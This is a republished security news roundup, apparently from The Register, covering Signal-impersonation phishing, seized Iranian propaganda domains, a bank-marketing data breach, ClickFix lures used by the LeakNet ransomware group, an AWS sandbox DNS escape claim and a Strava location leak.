Tuesday, April 7, 2026
Latest:

Threatshub.org sponsored-Post

The Register

Russians are posing as Signal support to launch phishing attacks

TH Author

Infosec In Brief Russian intelligence-affiliated parties are posing as customer support services on commercial messaging applications such as Signal to compromise accounts and conduct phishing attacks, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) warned last Friday.

The attacks target people with high intelligence value, like former government officials, military figures, politicians, and even journalists [We’re flattered – Ed] have snared thousands of individual accounts, allowing the Russians to read and send messages, and gather info from contact lists.

The attackers send messages advising users of “suspicious activity” related to their accounts and urge clicking a link to conduct a verification process. Once victims click, the baddies connect their accounts to the victim’s, or completely take over the account if the user is daft enough to submit credentials or a 2FA code.

Signal remains a highly secure way to exchange messages, but not even the best end-to-end encryption can stop intruders if users invite them in.

The FBI and CISA offer standard anti-phishing recommendations in their brief about the attacks.

Uncle Sam seizes four domains used for Iranian psyops

The US Department of Justice has seized domains associated with the Iran-linked group behind the cyberattack on med-tech firm Stryker.

These websites, the feds say, were used to incite violence and claim credit for disrupting the US med-tech firm’s operations. The domains were Justicehomeland[.]org, Handala-Hack.[to], Karmabelow80[.]org and Handala-Redwanted[.]to.

The attack in question hit US med-tech firm Stryker through a hole in Microsoft Intune, wiping out information on employees’ devices. Iranian hacktivist group Handala, considered to be a front for the nation’s Ministry of Intelligence and Security (MOIS), claimed credit for the Stryker attack on one of the sites, Handala-hack[.]to.

Operators of the sites also used them to doxx members of the Israeli Defense Forces (IDF), and to post claims of having stolen 851GB of confidential data from the Sanzer Hasidic Jewish Community.

FBI chief Kash Patel warned in a statement: “This FBI will hunt down every actor behind these cowardly death threats and cyberattacks and will bring the full force of American law enforcement down on them.”

But someone claiming to represent Handala was not impressed, posting a defiant message that states: “They may have taken down our website, but they will never take down our spirit, our resolve, or the power of truth.”

That “truth” apparently includes allegations of “witchcraft ceremonies” by the Sanzer community, according to the FBI’s statement, echoing age-old antisemitic myths used to justify violence towards Jewish people.

Banking services company warns 670,000 people of data theft

Marquis, a company that provides services to banks, sent out warning notices to more than 670,000 people that their information was stolen by a ransomware gang last August.

The letter [PDF] poses the terrifying question: “Who Are We, and Why Do We Have Your Information?”, before explaining the company is a marketing provider for financial institutions.

Stolen data reportedly included sensitive info like Social Security numbers, taxpayer IDs, and account info.

In an attempt to make things right, Marquis offered victims one month’s free membership to a service from Epiq Privacy Solutions that’s meant to monitor misuse of personal information and resolve identity theft. It also encouraged victims to “remain vigilant by reviewing your account statements and credit reports for any unauthorized activity over the next 12 to 24 months,” as if we all don’t have enough on our plates already.

LeakNet discovers ClickFix social engineering

The LeakNet ransomware group has moved on from its usual tactic of buying stolen credentials and now uses the ClickFix social engineering scam, according to a new report from security shop Reliaquest.

ClickFix, which we’ve covered before, uses fake messages, delivered through compromised but legitimate websites, to convince victims to take actions such as running commands that load a rootkit or other malware.

LeakNet uses ClickFix to serve a fake “prove you are not a robot” dialog that asks users to open the Windows Run dialog with the Win + R shortcut and paste in a command that appears to be a link to a Cloudflare Turnstile verification page, but actually runs an msiexec command.

That command downloads and executes a cleverly disguised loader based on the (legitimate) Deno runtime, which then runs the bad code directly in memory, helping to disguise the attack from file-focused forensic scanning techniques.

The tactic, Reliaquest warns, could let LeakNet expand beyond its current hit rate of about three victims per month.

The AWS sandbox that isn’t

Security outfit BeyondTrust Phantom Labs claims that the AWS Bedrock AgentCore code interpreter’s sandbox isn’t much of a sandbox at all. Although Amazon said running this service in sandbox mode blocked external access entirely, Phantom Labs claims that public DNS queries get through, which could let malevolent outsiders establish command-and-control channels and suck out data.

Phantom Labs says it told AWS about the problem last September through a HackerOne report, and AWS deployed a fix in November 2025 – but later rolled it back “due to other factors.” The end result? In December, Amazon updated its documentation to recommend customers use virtual private cloud mode if they want complete control over all inbound traffic.

Amazon awarded the researcher a $100 gift card to the AWS Gear Shop, Phantom Labs says.

Strava leaks location of aircraft carrier

French newspaper Le Monde last week reported that a mariner aboard an aircraft carrier went for a seven-kilometer run on its deck – while tracking it with his smartwatch, which later uploaded the run to the exercise-tracking site Strava.

The aircraft carrier’s location was therefore visible to the world, which The Register understands is a fact navies don’t like to reveal. France’s armed forces should know better, given president Emmanuel Macron’s bodyguards reportedly leaked their locations with the fitness app. – Simon Sharwood ®

READ MORE HERE